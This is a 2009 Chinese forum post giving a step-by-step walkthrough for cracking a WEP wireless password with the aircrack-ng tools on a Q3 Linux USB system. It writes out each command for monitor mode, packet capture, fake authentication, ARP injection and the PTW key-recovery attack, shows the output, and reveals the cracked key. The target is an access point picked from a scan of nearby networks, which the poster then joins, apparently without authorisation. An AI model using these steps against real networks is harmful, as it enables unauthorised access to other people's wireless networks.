我也成功了！全中文Q3系统spoonwep2成功破解wep无线密码

[复制链接]

muses

8 回帖	38 积分	1 小时在线时间

新兵上阵

注册时间: 2009-8-1

金币: 28 个

威望: 0 个

荣誉: 0 个

发消息

尚未签到

发表于 2009-8-4 12:01 |显示全部楼层

本帖最后由 muses 于 2009-10-15 10:12 编辑

声明：仅供技术交流，切勿用于非法用途，一切后果自负，You are at your own risks。

MAC地址是唯一的，为了保护隐私：****** 代表AP的MAC地址； XXXXX 代表本机无线网卡的MAC地址。

测试环境：华硕笔记本: X81  ；无线网卡intel 3945abg ； U盘启动Q3

一、安装Q3和破解工具

1. 到这里下载Q3安装包：http://club.prayaya.com/thread-9486-1-1.html  有安装工具，安装到U盘和硬盘都可以，很简单。
2. 成功启动之后，在Q3软件仓库里搜索并安装：spoonwep-wpa.ro ,同时自动下载sun-java6.ro

二、破解过程

1、启动无线网卡的监控模式，

在终端中输入：airmon-ng start wlan0
（wlan0是无线网卡的端口,可在终端中输入 ifconfig 查看）

root@prayaya:/# airmon-ng  start wlan0
Interface Chipset       Driver
wlan0       Intel 3945 a/b/g iwl3945 - [phy0]
            (monitor mode enabled on mon0)

2、查看无线AP
在终端中输入：
airodump-ng mon0
（说明：启动监控模式后无线网的端口现在是 mon0 ！！！）
看看有哪些采用wep加密的AP在线，然后按 ctrl+c 退出，保留终端

airoroot@prayaya:/# dump-ng mon0
CH 10 ][ BAT: 1 hour 46 mins ][ Elapsed: 1 min ][ 2009-08-04 10:04

BSSID             PWR  Beacons #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
....

我选了这个：
******  180    245       3 0 6  54. WEP  WEP       TPLINK_ELA

需要记住的：
AP的MAC地址：******
频道：6

3、抓包
另开一个终端，输入：
root@prayaya:/# airodump-ng -c 6 --bssid  ******  -w  wep mon0

CH  6 ][ BAT: 1 hour 16 mins ][ Elapsed: 17 mins ][ 2009-08-04 10:42 ][ fixed channel mon0: 3

BSSID             PWR RXQ  Beacons #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:14:78:B5:B5:7E  00:1F:3C:62:82:56 0 1- 0    0 185235

(-c 后面跟着的6是要破解的AP工作频道，--bissid后面跟着的是要欲破解AP的MAC地址，-w后面跟着wep的是抓下来的数据包DATA保存的文件名，具体情况根据步骤2里面的在线AP更改频道和MAC地址，DATA保存的文件名可随便命名）

4、与AP建立虚拟连接
再另开一个终端，输入：
root@prayaya:/# aireplay-ng -1 0 -a  ******  -h XXXXXX mon0
10:29:18  Waiting for beacon frame (BSSID: ******) on channel 6
10:29:18  Sending Authentication Request (Open System) [ACK]
10:29:18  Authentication successful
10:29:18  Sending Association Request [ACK]
10:29:18  Association successful :-) (AID: 1)

（-h后面跟着的是自己的无线网卡的MAC地址)

自己的无线网卡的MAC地址通过ifconfig查看：
root@prayaya:/# ifconfig |grep wlan0
wlan0    Link encap:Ethernet  HWaddr  XXXXXX

5、进行注入
成功建立虚拟连接后输入：
root@prayaya:/# aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b ******  -h  XXXXXXX  mon0
Saving chosen packet in replay_src-0804-102946.cap
You should also start airodump-ng to capture replies.

现在回头看下步骤3的终端是不是DATA在开始飞涨！

6、解密
另开一个终端，输入：
aircrack-ng wep*.cap
进行解密
（如果没算出来的话，继续等，aircrack-ng 会在DATA每增加多5000个之后就自动再运行，直到算出密码为至）
root@prayaya:/# aircrack-ng wep*.cap
Opening wep-01.cap
Opening wep-02.cap
Read 412511 packets.
#  BSSID             ESSID                   Encryption
1  ****** TPLINK_ELA             WEP (6737 IVs)

Choosing first network as target.
Opening wep-01.cap
Opening wep-02.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 6792 ivs.

                                                   Aircrack-ng 1.0 rc1

                                    [00:11:26] Tested 930098 keys (got 80003 IVs)

KB depth byte(vote)
0 0/  1 66(112640) 68(93696) 5F(93440) C6(92928) DA(92160) 04(91392) DE(91136) 56(89856) CA(89344)
1 0/  1 65(110080) E7(89856) DB(89344) 32(89088) FF(88832) 2D(88576) 74(88064) 9E(87808) C3(87808)
2 0/  1 65(113664) 81(92416) F8(92416) 22(90624) D3(90368) 91(89856) 63(89600) FF(89600) C9(88576)
3 0/  1 64(109056) 6F(91904) 56(91648) BB(90880) 83(90624) 3D(90112) 98(89088) 25(88832) 1B(88576)
4 0/  1 66(102656) D3(93440) 0F(92928) 78(91392) 60(90112) F0(89600) 94(88832) E3(88832) 7D(88576)
5 0/  1 65(105216) B3(92672) 2F(92160) 8C(91392) 7D(91136) 27(90624) 35(90624) D2(90368) C0(89344)
6 0/  1 65(107520) 31(95744) 30(92928) 0A(92672) 6B(92416) EF(91392) 74(89856) 63(89600) 66(89600)
7 0/  1 64(101632) 63(92160) B8(90880) 8C(90624) A8(90112) 16(89088) 10(88576) 1C(88576) 86(88576)
8 0/  1 31(112128) 37(92672) A6(89856) 00(88832) 81(88832) 2A(88064) 6E(88064) AD(88064) 99(87808)
9 0/  1 30(103936) D1(92416) 06(91392) 81(91136) F0(89600) 7C(88832) 48(88576) 5F(88320) 18(88064)
10 0/  1 8F(93440) 97(92416) B2(92160) 32(91904) 6D(91392) 29(90880) 57(89856) 9A(89856) 45(89600)
11 0/  1 17(92928) B5(91392) C4(90112) BE(89600) C0(89600) 16(89088) 31(88832) CE(88832) ED(88832)
12 0/ 15 D4(94528) 73(92444) DB(90168) 85(89780) 4D(88096) FC(88076) 5D(88040) FF(87716) 27(87688)

   KEY FOUND! [ 66:65:65:64:66:65:65:64:31:30:31:30:31 ] (ASCII: feedfeed10101 )
      Decrypted correctly: 100%

等待差不多10分钟。。。。终于得到密码了： feedfeed10101

7、收工
破解出密码后在终端中输入 airmon-ng stop mon0 关闭监控模式，或者重复步聚破解其他的AP。

8、拔掉网线试试

在开始 - 网络 - 运行 wicd 网络连接

如果提示没有找到网络，请点击首选项，在无限网络填上无线网络接口, 我的是wlan0

因为是成功破解之后才截图的，所有下图是已连接上的图：

在 TPLINK_ELA 点击高级设置：

输入密码：

确定，点击高级设置下面的连接。

ok了。。

我把网线拔了，wlan0 已经得到IP了。。

root@prayaya:/# ifconfig
eth0    Link encap:Ethernet  HWaddr
      UP BROADCAST MULTICAST  MTU:1500  Metric:1
      RX packets:2812 errors:0 dropped:0 overruns:0 frame:0
      TX packets:1760 errors:0 dropped:0 overruns:0 carrier:0
      collisions:0 txqueuelen:1000
      RX bytes:2344790 (2.2 MB)  TX bytes:229391 (224.0 KB)
      Interrupt:247

lo       Link encap

ocal Loopback
      inet addr:127.0.0.1  Mask:255.0.0.0
      inet6 addr: ::1/128 Scope:Host
      UP LOOPBACK RUNNING  MTU:16436  Metric:1
      RX packets:267 errors:0 dropped:0 overruns:0 frame:0
      TX packets:267 errors:0 dropped:0 overruns:0 carrier:0
      collisions:0 txqueuelen:0
      RX bytes:35501 (34.6 KB)  TX bytes:35501 (34.6 KB)

wlan0    Link encap:Ethernet  HWaddr
      inet addr:192.168.1.109  Bcast:255.255.255.255  Mask:255.255.255.0
      inet6 addr: fe80::21f:3cff:fe62:8256/64 Scope

ink
      UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
      RX packets:5928 errors:0 dropped:0 overruns:0 frame:0
      TX packets:5169 errors:0 dropped:0 overruns:0 carrier:0
      collisions:0 txqueuelen:1000
      RX bytes:6164841 (5.8 MB)  TX bytes:821661 (802.4 KB)

Q3交流群：
1群：50796699
2群：29588436
3群：14493434
4群：72853613

Q3在线技术支持：1136250732

wep, 密码, 无线, 系统, 中文